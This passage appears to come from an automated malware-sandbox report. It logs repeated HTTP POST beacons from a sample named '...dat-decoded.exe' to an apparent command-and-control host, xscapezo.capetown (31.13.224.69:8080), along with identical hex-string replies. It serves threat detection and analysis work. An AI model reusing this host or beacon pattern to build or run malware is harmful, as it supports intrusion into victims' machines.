31	192.168.2.4	49806	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:18.787877083 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:20.463035107 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:19 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06
Dec 16, 2024 12:19:20.463202000 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:19 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49812	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:20.693550110 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:22.024398088 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:21 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49818	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:22.256730080 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:23.528111935 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:23 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49821	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:23.757987022 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:25.000852108 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:24 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49825	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:25.240271091 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:26.498600960 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:26 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49831	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:26.724651098 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:27.987004042 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:27 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49832	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:28.224751949 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:29.470256090 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:29 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49838	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:29.713224888 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:30.980479956 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:30 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49844	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:31.209961891 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:32.459955931 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:32 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49845	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:32.695274115 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:33.964093924 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:33 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49851	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:34.193780899 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:35.497426033 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:35 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49857	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:35.724056959 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:37.048379898 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:36 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49862	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:37.294127941 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:38.602039099 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:38 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49864	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:38.834815979 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:40.110639095 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:39 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49870	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:40.351411104 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:41.613267899 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:41 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49876	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:41.919815063 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:43.175744057 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:42 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49877	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:43.432024002 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:44.708137989 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:44 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06
Dec 16, 2024 12:19:44.822911978 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:45.367132902 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:45 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49883	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:45.600503922 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:46.893455982 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:46 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49888	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:47.132656097 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:48.420160055 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:48 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49894	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:48.659271002 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:50.067240953 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:49 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49897	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:50.313195944 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:51.581099987 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:51 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49902	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:51.823754072 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:53.123792887 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:52 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49907	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:53.351125002 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:54.639369011 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:54 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49909	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:55.029300928 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:56.317684889 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:56 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49915	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:56.552582979 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:57.823740005 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:57 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49920	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:19:58.052759886 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:19:59.307533979 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:19:59 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49926	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
